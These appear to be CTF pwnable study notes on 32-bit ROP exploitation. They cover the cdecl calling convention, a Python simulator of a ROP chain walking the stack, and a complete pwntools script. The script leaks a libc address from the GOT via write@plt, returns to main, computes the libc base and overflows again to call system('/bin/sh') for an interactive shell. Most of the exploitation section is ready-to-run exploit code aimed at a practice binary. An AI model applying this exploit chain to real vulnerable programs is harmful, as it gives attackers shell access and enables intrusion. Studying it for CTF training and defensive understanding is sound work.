Pwnable - 32bit ROP

  • x86 calling convention (cdecl, the default on 32-bit Linux)
    • The caller places all arguments to the callee on the stack
    • Arguments are pushed right to left, so on entry the first argument is at [esp+4], the second at [esp+8], and so on
    • Stack cleanup is performed by the caller, not the callee: when the callee returns, its arguments are still sitting on the stack
  • eip control (overwrite the saved return address)
  • "/bin/sh\x00" address (libc has one, or place it in a buffer you control)
  • leak a libc address (e.g. read a GOT entry) to compute the libc base
  • GOT overwriting
  • argument control -> a pop [reg] ; pop [reg] ; pop [reg] ; ret gadget. Its only role is to add to esp: after the callee returns into it, the three pops discard the three arguments so the gadget's ret lands on the next entry of the chain
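Added example (not part of the original notes): a tiny stack walker that executes the leak chain the way the CPU does, to show why the pop;pop;pop;ret gadget is needed under cdecl. All addresses, the gadget register names and the function table are constructed for illustration and do not come from the notes' target binary.

```python
import struct

# Constructed addresses for illustration only; they are not from the
# notes' target binary.
WRITE_PLT = 0x08048390   # write@plt
MAIN      = 0x0804850b   # main()
WRITE_GOT = 0x0804a014   # GOT slot holding write@libc
PPPR      = 0x080485a9   # pop ebx ; pop esi ; pop edi ; ret   (discards 3 slots)
PPR       = 0x080485aa   # pop esi ; pop edi ; ret             (discards 2 slots)

# What the "CPU" knows: cdecl functions with their argument count, and
# gadgets with how many stack slots they pop before their ret.
FUNCS   = {WRITE_PLT: ('write', 3), MAIN: ('main', 0)}
GADGETS = {PPPR: 3, PPR: 2}


def p32(v):
    return struct.pack('<I', v & 0xffffffff)


def build_chain(gadget, overflow_len=0x88 + 4):
    """The leak chain from the notes: write(1, &GOT[write], 4), then main()."""
    chain = b'A' * overflow_len                      # dummy + saved ebp
    chain += p32(WRITE_PLT) + p32(gadget)            # callee, then its "return address"
    chain += p32(1) + p32(WRITE_GOT) + p32(4)        # write's three cdecl arguments
    chain += p32(MAIN)                               # where the gadget's ret lands
    return chain


def run_chain(chain, overflow_len=0x88 + 4):
    """Walk the chain the way the CPU does after the overflowed function's ret.

    Returns the list of calls made; the last entry is ('main', ()) on
    success, or ('crash', eip) when a ret pops something that is not code.
    """
    words = [struct.unpack('<I', chain[i:i + 4])[0]
             for i in range(overflow_len, len(chain), 4)]
    esp, trace = 0, []
    eip, esp = words[esp], esp + 1                   # ret of the overflowed function
    while True:
        if eip in FUNCS:
            name, nargs = FUNCS[eip]
            # cdecl: args live at [esp+4], [esp+8], ... and the callee leaves them there
            args = tuple(words[esp + 1: esp + 1 + nargs])
            trace.append((name, args))
            if name == 'main':
                return trace
            eip, esp = words[esp], esp + 1           # callee's ret pops only the return slot
        elif eip in GADGETS:
            esp += GADGETS[eip]                      # pop;pop;pop == add esp, 12
            eip, esp = words[esp], esp + 1           # gadget's ret
        else:
            trace.append(('crash', eip))
            return trace


if __name__ == '__main__':
    print(run_chain(build_chain(PPPR)))   # write(1, GOT, 4) then main()
    print(run_chain(build_chain(PPR)))    # write(1, GOT, 4) then crash with eip = 4
```

With the three-pop gadget the walk reaches main(); with a gadget that pops one slot too few, the gadget's ret consumes the last argument (4) as the return address and the process faults at eip = 0x4. For a single call you could put main directly in the return slot (classic ret2libc), but as soon as a second call has to follow the first, the arguments must be skipped by a gadget.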

Libc Leak

from pwn import *

# Assumed setup, not shown in the original notes: the target binary name and
# the pop;pop;pop;ret gadget (register names are an assumption; any three
# pops followed by ret will do).
context.binary = e = ELF('./pwnable')
p = process('./pwnable')
pppr = next(e.search(asm('pop ebx ; pop esi ; pop edi ; ret')))

payload = b''
payload += b'A' * (0x88+0x4) # (dummy + ebp)

payload += p32(e.plt['write'])  # return into write@plt
payload += p32(pppr)            # write()'s return address: pop the 3 args, then ret
payload += p32(1)               # fd    = stdout
payload += p32(e.got['write'])  # buf   = &GOT[write]
payload += p32(4)               # count = 4, one 32-bit pointer

payload += p32(e.sym['main']) # ret2main: the gadget's ret restarts main for stage 2

p.sendlineafter(b'Input:\n', payload)

leak = u32(p.recv(4))   # the resolved write@libc address from the GOT
info(hex(leak))

Execute system('/bin/sh\x00')

# Resolve libc from the leak. Assumption: the remote libc is the one the
# binary links against locally (e.libc); otherwise load the matching libc.
libc = e.libc
libc.address = leak - libc.sym['write']   # libc base
system = libc.sym['system']
binsh = next(libc.search(b'/bin/sh\x00'))

# main() was restarted by the ret2main in the first chain; overflow it again
payload = b''
payload += b'A' * (0x88+0x4) # (dummy + ebp)

payload += p32(system)   # return into system()
payload += b'B' * 0x4    # system()'s return address (don't care, no call follows)
payload += p32(binsh)    # argument: "/bin/sh"

p.sendlineafter(b'Input:\n', payload)
p.interactive()